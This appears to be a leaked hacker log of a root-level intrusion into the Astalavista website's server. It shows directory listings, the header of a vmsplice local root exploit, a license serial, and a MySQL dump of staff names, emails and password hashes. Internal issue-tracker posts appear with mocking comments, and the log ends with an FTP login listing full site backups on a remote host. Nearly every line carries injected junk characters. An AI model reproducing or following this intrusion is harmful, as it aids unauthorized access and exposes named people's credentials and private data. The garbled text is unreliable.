' V8 x2 @1 W* p' N; a% \-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
% g! F# }7 Z' f0 U2 T( s9 f: [drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system8 P* t+ |+ {8 v! k/ a g
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history# z" A; ]$ J: c7 ?4 P2 |: D
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
7 ?& z ~" z2 E+ i9 D1 P-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile* s3 u( z$ X( X% }7 O
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc' |( L) `9 P) m) r3 ` e3 K
drwx–x–x 3 com com 4096 Jan 29 2008 domains
2 b: T, {0 |9 c# f3 W1 n* F-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed7 X3 F/ @3 X0 k2 N
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap: |% x7 p- i6 V8 w; I1 J4 G3 W
-rw——- 1 com com 69 Nov 18 2008 .lesshst- ]3 w5 B1 d. N0 ?1 V
drwx—— 2 com com 4096 Sep 24 2007 mail
1 \7 @! b) \7 T-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
9 z5 a) O, n8 o) `/ B3 V9 ~drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp1 Y% T; {3 a. v8 m9 T
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html4 H% L/ S) I/ C* w+ x3 ?6 |
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
2 E! P" l! I1 [0 ~% D" d9 U) Kdrwx—— 2 com com 4096 Aug 26 2008 .ssh
; v) \3 C/ O1 v, H8 f8 I. Q" a-rwx—— 1 com com 8515 Feb 10 2008 t w/ T/ z7 t! I& G
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c# p6 ]# {& g/ u! c& p# F
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
) { T' ]/ N1 I-rw-rw-r– 1 com com 617 May 20 2008 .toprc
$ H$ q5 e j2 w" c-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
8 _0 S" S C4 D-rw——- 1 com com 16629 Mar 28 21:46 .viminfo, O% H# C; d2 M1 K! k u; K
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
7 k e; C" X! m/ E2 [9 x9 a7 \
! p* f8 n7 V5 V8 V# hsh-3.2# head t.c
9 P( n% C8 j4 \' x/*+ i- {8 _8 s }* F
* jessica_biel_naked_in_my_bed.c
/ u9 W ^# X8 [3 h2 w; E- p*; J0 D0 I* T1 O3 h# F* Y& K
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.0 _* r0 S8 y' d, l/ E
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.6 {0 M2 G" z2 u! o p
* Stejnak je to stare jak cyp a aj jakesyk rozbite.5 e; k5 U! b3 |# [
*
+ t; L2 g" @" X9 ~2 O% q, F* Linux vmsplice Local Root Exploit. |1 Z6 s) x. F8 }
* By qaaz
) p* |: d8 K7 U- l' S5 Z*
# y/ _, U4 n7 k, N
3 i* B s9 k' o8 ^6 h$ Y( Qsh-3.2# cd /
( F9 I0 _3 @, | }sh-3.2# ls -la; l) E$ ? w7 L. y3 m
total 360
4 c9 j: y! ]2 b9 } Qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .; ]7 a9 @$ X8 c9 `$ n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! N/ h* w* Y$ H/ M-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
: u9 H/ u* N0 |7 T: H" K" [/ F6 _-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
# V: v9 a6 Y9 Z; s" G6 e. {5 j. c6 }-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
( P# H8 |8 C0 s3 D+ o. `/ E-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck* z$ g# o" @- @, C& z
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
* t. l( |0 E, I' r8 l7 K& O, m% D" ldrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
) g5 ]- F; j! F' q+ Z& V5 Vdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
5 [6 j% x! Y. _drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
8 l6 m: e2 F( ]; wdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
9 c! |6 K! x+ U( w& xdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
8 e/ a! y3 R5 N5 L3 sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home H) j& x' T3 K' ~& W) p- C/ s
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf9 G, a7 N+ ^6 g; C
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib8 T# f8 {: O x9 F1 Z% E5 g, G) X9 a* b# U# Z
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64& {: J6 j9 L' @% g4 p P8 L
drwx—— 2 root root 16384 Sep 11 2007 lost+found
* X' C N( `2 B) W7 o; R6 kdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media; D Y3 ]% }' |( V; e w
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
( [. ~$ u& T4 n% Y3 jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt8 {8 V8 l; t1 L/ [
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg$ V5 |" M5 O+ N& J
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
! a- g& F: H' G! ]$ Idrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt% `9 P# a& `" E# f
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc r- s7 p* l8 O( N
drwxr-x— 15 root root 4096 Jun 4 08:40 root
& T( X4 k. }! Gdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin. C# x+ C9 D3 H" {2 ?( c3 M3 Z
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux0 q* ` F: ^6 H7 l/ g* h+ S" } |
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
5 C2 ?: W/ ]: k2 P5 c% U1 Udrwxr-xr-x 11 root root 0 Jun 3 02:42 sys. U( [; ]4 Q$ O
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
) z$ k' r* e7 ydrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr6 h; ]/ }- k1 N! r5 w1 T6 O
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
% {; }: }5 i3 n
" A* \* s s' e9 N3 j/ o8 |! ush-3.2# cd opt
& i. D0 \+ R- Y+ t/ Ish-3.2# ls -la8 W% y2 I8 \; K& y+ s+ n- v
total 200 x7 e$ M4 ` z& V; }
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ./ t @& V1 f. ]1 \! b
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! d9 I. a+ P% E* `6 S, k: [* Ldrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
0 @; l) \' s' Q ?9 c6 m8 E& U
1 \0 b. X6 t2 `. q0 S3 p( Dsh-3.2# cd lsws/
$ r- ?# s' I! `sh-3.2# ls -la
7 b* X- o: `# ]8 Ztotal 108
7 R' z! y1 }) y) `+ L7 {) N; Kdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
: M( b: U4 H3 s Idrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
, B* l0 |; e( H, G9 Sdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
! c t0 _: O- O0 N0 \drwxr-xr-x 13 root root 4096 May 29 15:10 admin
+ h" j; G5 F6 o4 A. Tdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate7 C4 X3 R5 b1 p' }, F1 W
drwxr-xr-x 2 root root 4096 May 29 15:10 bin8 n! r4 Y$ j3 x- l( Y
drwx—— 4 apache apache 4096 Jun 3 02:43 conf/ O# [' Y9 P4 D' D
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
% r" D# P6 j t" ]6 \4 t0 I0 ^$ p5 ydrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
# v+ @, @% H; c9 R6 s1 Y5 C1 Edrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin p0 K' Z- R% F' w6 x
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib3 h1 b# T/ n: n
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
' Q9 V+ W" [# t8 u-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
; `8 K( M8 T! ~. y( R6 s1 k: ]-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
( a/ F' Q: I. P-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
/ _- k& h5 k7 zdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs. t( p3 ]$ T9 |
drwxr-xr-x 2 root root 4096 Mar 20 2008 php4 S( P+ o0 e8 q% ?
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
- w& ?: b2 D0 e5 J+ M6 J, b) bdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
) P0 ?& W3 k, H: o' b-rw-r–r– 1 root root 6 May 29 15:10 VERSION6 ]; o& U6 N" m1 P
! Z4 b1 i: K" P8 f3 R; wsh-3.2# cd conf
6 C, y0 w+ x1 [: _8 r2 fsh-3.2# ls -la
+ t K4 t8 F% u) Btotal 48
9 m3 J7 l. o. n- K( S5 C$ Vdrwx—— 4 apache apache 4096 Jun 3 02:43 .
1 l3 o4 j) d' A* J3 o2 B% udrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
" T7 i) i# G6 r) odrwx—— 2 apache apache 4096 Mar 20 2008 cert* X/ f- f9 T6 K2 |$ e; n
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
+ |& S) F' W& T! d( c- r( w; \$ n-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
; N' V1 w0 e. ^" b Y* ]2 ]; X-rw-r–r– 1 root apache 0 Jun 3 14:11 .last: x4 j3 N7 [' u# R0 L6 r
-rw——- 1 apache apache 256 May 29 15:10 license.key. x0 ^0 h8 ~- {7 P+ n" A
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old# y8 f/ A( n3 X& e
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties/ X4 v9 t, P# V+ U
-rw——- 1 apache apache 20 May 29 15:10 serial.no" U( Q/ \. L% | C `# x
drwx—— 2 apache apache 4096 Mar 20 2008 templates
6 z W6 h7 h2 E% B! n' E2 y2 h* w; p" v
sh-3.2# cat serial.no
' X! r8 \6 F$ |; W) kIbDl-oVsO-CKqL-wVRa
! q6 {" v- j% _, q$ O7 }. D
$ {' b; w- t( O0 nsh-3.2# mysql
% M( [' ]7 h0 a) h. t, N! `! JWelcome to the MySQL monitor. Commands end with ; or \g.9 q- ^, V: K& |' Z' G
Your MySQL connection id is 2868444 t7 J. P# {; d5 c7 n
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 T1 r: p' r, t6 k+ R1 o7 T
9 {! c' M5 w D% ] L# RType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; f; F. Y' V% n! m% Q
1 |, r0 r/ ^3 _# Z( amysql> show databases;
3 V( C8 p3 e# u& `, I! T F' C8 Q7 ]+———————–+
$ x* ^! r6 O! }& }| Database |7 }0 R/ i9 _7 t' f
+———————–+
4 y& S4 M o, Z5 d/ q| information_schema |( O7 a5 ?4 [9 M
| astanet_ads |
6 P; F! ], m# ]) P5 I3 ]8 x0 F| astanet_mailing_lists |
0 i- b5 s0 o/ V. ?% M| astanet_mediawiki |: j, s' T1 Y U( T
| astanet_membersystem |" i* Q, Q( n8 [% x9 X3 F3 q% l2 k- V
| com_contrexx |
- Q6 V- {$ P, L" Y) `0 ^) w9 s* i| com_contrexx2 |7 N$ i' _! e, h" N- Q9 _: W
| com_contrexx2_live |
: _$ C0 T8 z0 {7 X| da_roundcube |
. ?; t; _. [0 D; @0 I5 v7 D| dolphin |5 K- a2 I& k! X2 I+ _& I {
| ideapool |
+ q) Y$ T. w. w" m| mysql |
# E7 s& v2 G( d5 I3 ?( A| test |
; y8 J' F; B* S4 @| yourmaster |
: ]& S/ { p5 A/ z+———————–++ j4 ^0 ^. o3 M1 Y6 n$ H1 Q
14 rows in set (0.00 sec)) x( x8 o" ?: v4 H
. `5 m. k' _% J0 f8 e6 i0 Ymysql> use ideapool
5 e! c6 u( M g$ w* HDatabase changed
, B2 m; R, \) x! F' @. N Rmysql> show tables;* T( l1 S9 g2 @+ w7 B
+———————————–+8 l0 t- Z9 }0 c$ R* U
| Tables_in_ideapool |7 Q5 Y( h2 Y4 g5 L5 ~
+———————————–+
& _: [) s$ E, N. b9 E6 Q3 C6 j| eventum_columns_to_display |! G6 ?' J( o2 \1 o- G' U
| eventum_custom_field |
" Z1 K* r2 [- _$ F| eventum_custom_field_option |9 w# f4 E6 e5 g+ n _' \. O( G
| eventum_custom_filter |8 f5 z. t) Y; d9 p
| eventum_customer_account_manager |
3 _6 s5 S/ N$ V| eventum_customer_note |
1 K- b& a$ \7 m5 z- u| eventum_email_account |1 u# V* d' p6 @3 D9 C" I
| eventum_email_draft |# w9 w. c" g- i+ @4 {
| eventum_email_draft_recipient |. R& t- l k' I5 s6 a
| eventum_email_response |7 `2 Y1 g8 _; E6 T% v" m& Q$ k& w: k
| eventum_faq |
* m* P0 k& H' L% W5 Q% U| eventum_faq_support_level |
9 U Y+ N, n# t| eventum_group |
. N3 J# K( B# y6 l; ~| eventum_history_type |
/ v2 f- a6 J, W| eventum_irc_notice |
# [1 J% J. Z; e) t( Y| eventum_issue |
9 H7 M* _/ m2 X6 E| eventum_issue_association |
' c8 j# s$ K o$ U4 v$ f. [| eventum_issue_attachment |$ l. Z( @% H5 I+ t4 @5 h
| eventum_issue_attachment_file |6 ~3 r( G2 H$ W Y" E, M, L! V
| eventum_issue_checkin |' Q6 @$ o* L7 v# u; _
| eventum_issue_custom_field |3 X& f/ u+ v; k. A6 x+ Y. W
| eventum_issue_history |
6 X m6 R) n: k0 l6 X| eventum_issue_quarantine |
u9 `, ]4 V: I# p ~; k8 ~| eventum_issue_requirement |6 m) F+ O$ u1 L* ^. a) S# X
| eventum_issue_user |. C* j2 j6 Z" ?
| eventum_issue_user_replier |! m% o/ ]6 I1 |& U" }/ f
| eventum_link_filter |4 E. i9 T+ M5 D( `& c! d
| eventum_mail_queue |
1 R9 Y' q; G+ v4 P0 N0 l; Q| eventum_mail_queue_log |
7 t! i- o" u" k0 b7 s| eventum_news |
" J* P4 M# ~0 }; |% v| eventum_note |
8 p8 u0 ~% `" m8 O; q+ s! d& r| eventum_phone_support |
: n9 G0 g" q- A$ S+ [| eventum_project |8 D+ U% W5 F. n8 E! C
| eventum_project_category |- E$ _$ t# r+ V/ I; G5 [% M
| eventum_project_custom_field |
' B# r0 }3 J6 n8 b| eventum_project_email_response |8 Y7 m9 `6 q7 S0 y! K- q6 Q
| eventum_project_field_display |
% A. P0 {' g/ y1 `* n| eventum_project_group |
$ U' T* C$ p3 w, q2 t& E| eventum_project_link_filter |: J4 q0 p) H) O: O' i3 b3 R
| eventum_project_news |5 r# O6 e/ ?: g4 v2 I* F
| eventum_project_phone_category |- O: Q# M y* o% k
| eventum_project_priority |
0 U( |# c: h1 Y) C| eventum_project_release |
0 `8 Z0 x' @; K1 I X| eventum_project_round_robin |
) x" Z3 U7 l' C5 j/ M9 t| eventum_project_status |% _( M8 N; |, q0 n; O
| eventum_project_status_date |
4 a6 V% w' M, r* g; b| eventum_project_user |* g2 ~+ Z- N& ~! @- a
| eventum_reminder_action |
. r* V/ d% Z, l| eventum_reminder_action_list |
0 V2 n( b( g+ M4 b% O| eventum_reminder_action_type |
$ j& Z+ U! h( C- `8 Z% P| eventum_reminder_field |4 ^: F! q$ S' J$ P
| eventum_reminder_history |* _6 r0 b3 X5 D% @
| eventum_reminder_level |
x$ b8 J5 V" B- b) Y| eventum_reminder_level_condition |$ ~% `! J# r3 B3 K7 i7 ?+ C
| eventum_reminder_operator |
) \! l( p5 L6 Q6 ]| eventum_reminder_priority |/ f: y4 k: Q# r
| eventum_reminder_requirement |
; K( o4 d( T* K( m6 P$ r" o& O# B| eventum_reminder_triggered_action |0 v" K! ]' K$ V4 |+ K# }
| eventum_resolution |7 T. A7 x# b* ^1 Y
| eventum_round_robin_user |' U! l- U2 L- A/ e( v3 ~
| eventum_search_profile |1 \4 \+ W& S# p8 ^# |/ t0 K2 Q
| eventum_status |
5 w7 f, H8 L9 l$ a! P5 j# F5 u| eventum_subscription |8 q( q5 n) b& Y4 M
| eventum_subscription_type |
9 g) B4 m% R7 z1 C8 z6 j8 D8 n ~| eventum_support_email |
* r p: g( v. X| eventum_support_email_body |+ Y: P, T! O3 O/ V7 d
| eventum_time_tracking |
/ k4 o' |" ^8 Y: s7 s| eventum_time_tracking_category |
: h) s( b* ? [9 ^# {8 n5 V| eventum_user |' D: g' w3 j l# d& W+ U
+———————————–+
' G8 C. U& V1 K w+ _9 z+ h) Y% d/ A69 rows in set (0.00 sec)$ ~2 ?0 X7 v* {' u6 \% F- v5 ^
1 Z; M7 v7 o. K1 c9 _: ~6 Dmysql> describe eventum_user;* p3 D. o. g7 L8 R% I
+————————-+——————+——+—–+———————+—————-+. r" ~3 F/ r2 y) h- c, V5 J+ l
| Field | Type | Null | Key | Default | Extra |9 P2 ?4 a2 |( V: p
+————————-+——————+——+—–+———————+—————-+
* h9 t+ ~2 P6 T7 ~) a| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |2 p; e9 F: U% V; t, J1 R
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
1 N+ F, [- x+ h/ [| usr_customer_id | int(11) unsigned | YES | | NULL | |
# t' r" B" |" x) h. D& Z' z| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
! s$ V" R4 R4 q5 E) v( z5 i# g| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |2 q& K! J# p `* e; B4 C
| usr_status | varchar(8) | NO | | active | |
& \( M4 a1 a6 p+ ~& G| usr_password | varchar(32) | NO | | | |
1 ~: [# k2 C( g, L+ q Y+ W- Z| usr_full_name | varchar(255) | NO | | | |( |1 s8 c. B8 d5 r$ E
| usr_email | varchar(255) | NO | UNI | | |
; T3 J% D. a* x+ }- j| usr_preferences | longtext | YES | | NULL | |2 w# |% f6 [( p& U# |6 t. v y
| usr_sms_email | varchar(255) | YES | | NULL | |
9 o& R6 i+ _ _% T| usr_clocked_in | tinyint(1) | YES | | 0 | |+ q8 q. M w# U& r
| usr_lang | varchar(5) | YES | | NULL | |
2 Z$ N1 w0 k4 _2 G+————————-+——————+——+—–+———————+—————-+
+ V: J- C5 T8 t; x8 T* ]( y8 j13 rows in set (0.00 sec)9 }! e. E- w* t$ ^
6 P* z5 t2 E1 O8 M$ xmysql> select usr_full_name,usr_email,usr_password from eventum_user;7 }! M% p o) k$ A
+———————-+——————————-+———————————-+
I% S& T( Z/ g# v/ `5 W4 ]| usr_full_name | usr_email | usr_password |
! C; [9 }8 C0 C/ v+———————-+——————————-+———————————-+
+ R3 O3 D# P7 ?/ P5 u| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |. s' C! n4 Y ~* E
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
; d) a& a z0 D4 R5 D& h| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
! h8 C* ?/ C& c+ f; Y| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |* u( T# E$ L/ {& e* b
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
* j5 Z* o& K d# y5 R% n% f| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |6 \6 m' ?8 |8 L
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |% g: v: r# ~" j" B- S* E: e. C! l' U
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |! ~8 V2 a8 u0 t0 P. w9 Q. @
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e | W9 B: l' t+ e4 l- Y
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |6 R+ }5 o/ E+ h" C4 r/ \" c
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |+ _# T; L6 G: R8 g4 E/ e
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |3 Q2 E! z! h$ ~- {; l
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
* ]5 j" P# S4 |, e| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |1 K- ?5 `3 [! f8 \
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |( [- M3 q2 C9 i
+———————-+——————————-+———————————-+
0 b( f1 ?6 L. I) I15 rows in set (0.00 sec)
/ q `' s4 Z. Q, Y6 Q! B1 i* \2 @
* r$ u, V) k& p# J' O; i! Q' ~2 Tmysql> select iss_description from eventum_issue where iss_id = 43;! [2 g; t D( H: s8 b) i
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 m3 s; s! b5 g| iss_description
: Y4 K+ a9 r3 w, U/ A! n|2 A: i5 z3 C9 d) v( D
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
2 ^2 c' {3 z: A; D W* ] r| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
. i- k( i4 I4 e! o$ h0 p& [' o! G- Qconnected for 90 mins… 120mins… so what i propose is something like:
) ~' w5 V5 s! P9 S2 A( A链接标记[url]http://www.surfthechannel.com/[/url]
; U! G7 D; J% Z) Rsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system' U- O/ h; X& p$ }
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
& q' B5 q2 I* w- \break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
$ m3 _' }' a5 k* G9 wif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…( D* D& Q6 f6 I8 `
" ]* j. t2 O1 H. hWe could also put advertisement during play on the flash video player itself… extra $$…5 g# I: m0 Y+ y0 h: V' ~( ~0 j
/ H) F* e9 S4 V
By sykadul |
' l0 _1 [/ a% _: p" x- ]" B. q$ L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
+ c& t/ F( z7 [$ T) f1 row in set (0.00 sec)
( H! [9 v7 N$ \6 {6 ]$ j! m. b0 a D% S! c( ?" @# e
// Money and extra $$ is all they care about. remember that.
3 ? t1 Q! C1 n7 W
% S" U2 ?1 L" d7 H; X+ nmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
3 b2 o; ~" y6 l: C7 K+————————+——————————————————————————————————————————————————————————————————————————————-+
& W/ q' H$ @( [! q) ^- u| iss_summary | iss_description
" t7 a9 V3 E) x/ z, q|. C/ M# n& [/ q# d, W0 {2 E
+————————+——————————————————————————————————————————————————————————————————————————————-+
1 l! s, O: u+ ^5 w) }| Forum for REAL EXPERTS | Hello,
+ s! Q, U; y. l
6 W" P7 ^0 l1 K6 l6 v# HIshtus and I,
) m( |8 ?0 U1 k' @$ \) r) R
6 J# `- }$ S V: p8 ICame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide' ^8 h' r6 {/ F5 T4 G
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
8 `5 e- C$ {" B* n4 s# ?! S% t0 f( p5 @
5 ^ k0 q5 j0 J5 {; ~6 o" Y1 pOne example a friend of mine from coresecurity.com!
8 s( @' D: j6 d/ B$ C6 H
: j1 v0 l" @. iWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
% B( m% M! ], U2 I# Z
y- e, l" y1 c' S' N; K" r|( I% t3 h9 z' |2 Y4 q3 f
+————————+——————————————————————————————————————————————————————————————————————————————+. n" ]4 T. J1 o! W+ @1 ^
1 row in set (0.00 sec); w% z' }3 u9 W9 n6 E( A3 w, q, R
" J% O/ [3 e, b0 k
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…, t, f+ K# t1 {, R# O* E- F; G
. e7 E6 f% I4 y, N/ Nmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
% }, r! h# N+ `# M" c1 i1 @+——————+———————————————————————————————+
) A/ @8 k7 n% R* j/ T8 c2 D! j| iss_summary | iss_description |+ v! \ n! l. ?+ B+ T; j
+——————+———————————————————————————————+4 k# h& {# r# I0 |
| Website guidance | Virtual Girl which guides you trought the website.
* W/ v9 ^ S& \0 y5 K8 O f
! q1 J$ C* j" EWe need a girl with who you can ( talk )!!!
) W6 G, a; f7 |Also for the News!
! i% M4 i4 }/ s* @4 l7 {) Y' J/ wSo my suggestion is a girl who read you the news loud if you like!
$ f" X9 B0 K5 Q9 X# C+ B5 {' oyou can choose between read yourselfe or she read it for you or both!
4 U& h1 T; y9 J; e6 _, d
7 Z( k$ [% y" x; Z4 i: h" a* |Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 H* x" m' R! g0 }0 ~) |! V/ y. G" P* |' f' k+ o- i
Have a look on the example girls!!
: K, e/ H6 `/ i4 _
* {. L* K: h6 n2 Q3 O5 k X链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]) s/ M' s" R8 j' {+ a- p
; {4 S2 a1 g& D2 T' P: T8 lor that
* M5 }: _9 J1 U7 [" U! E8 j i0 ~& P" Y1 b( S
链接标记[url]http://www.yellostrom.de/[/url]
* q, W6 l7 u/ C, u
4 O: U) k* o( Z9 i|7 {& J- d7 p3 P9 w+ C+ S
+——————+———————————————————————————————++ G! i2 q# o+ }0 ?- R
1 row in set (0.00 sec)
, O6 {' Q$ u$ L/ B* f# c8 Y
' J8 \5 p! J; }6 L! v// ha ha.) [" y4 u: l) u% D) R
! d4 e2 Y0 e$ T. j
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;0 l2 r) v" ^ r6 p
+————————–+———————————————————————————————————–+
' T3 ]* @. |/ y: \/ ?( H8 E- A& o| iss_summary | iss_description |8 i8 L5 b3 t$ p2 r
+————————–+———————————————————————————————————–+
) }1 S5 s0 @7 p) ]1 w$ V| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |0 Z i) y+ w, {* Q
+————————–+———————————————————————————————————–+3 U' x) A# S; L$ Z( v! V
1 row in set (0.00 sec)
9 M0 S& h; ~& J! O9 m: S; I" U9 K' W$ k4 c" G6 v; V
// LOL.* L3 m4 k8 z( D
, W( o4 E5 b& n) _
mysql> exit E0 A9 Y' f" [) ~0 i$ H# n
Bye
" F5 r) V, q& |: \- h3 `. ~( ~" R9 |' a+ ~2 H
sh-3.2# ftp 212.254.194.163
# D" S6 ^7 c f+ }Connected to 212.254.194.163.
3 j' o. d, B" u! C220 BackupCOM_VW FTP server ready.0 T9 l# S0 C6 L$ ~; Q
504 AUTH: security mechanism ‘GSSAPI’ not supported.
; t) Y) s+ g: e+ Y$ l3 Z \. J504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.6 A) L+ g+ @; [2 n8 H: u( n
KERBEROS_V4 rejected as an authentication type5 j3 S: s/ [7 t. a2 {/ N
Name (212.254.194.163:root): astalavista.com; a# U/ b' C$ H3 Y4 F
331 Password required for astalavista.com.
2 a d4 W5 [; {8 L0 GPassword:
3 I. O0 I- L7 ?2 |3 K& Z230 User astalavista.com logged in.
! |' C9 P! w& bRemote system type is UNIX.
8 N0 \* |" `4 EUsing binary mode to transfer files.- [4 ^' A0 z8 L# p0 g! t- ?
ftp> ls -la- ` S6 D4 S: U& `4 s K
227 Entering Passive Mode (212,254,194,163,2,188)
1 O9 m7 Y2 g ^; R; D! j7 [150 Opening BINARY mode data connection for ‘file list’.! F, y$ g( O$ V, X) V/ L
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com. K K. |9 `+ \5 h& T" y
226 Transfer complete.% l6 t: I. N& ]0 R3 {# a& O2 c; \$ ^
ftp> cd astalavista.com: Y' y% l$ g- m. |
250 CWD command successful.$ j# T& r2 K. h+ { H( v0 s R
ftp> ls -la8 v0 g7 p% g1 T/ P: G
227 Entering Passive Mode (212,254,194,163,2,189)) \( J+ t, Y1 |- a
150 Opening BINARY mode data connection for ‘file list’.
( X9 X5 J$ ?0 O% S v* Z( P-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar2 b( d9 W" X9 I1 @
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2& q- T+ f. I* {& |
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
' i. Y2 D. A7 N% F% B-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
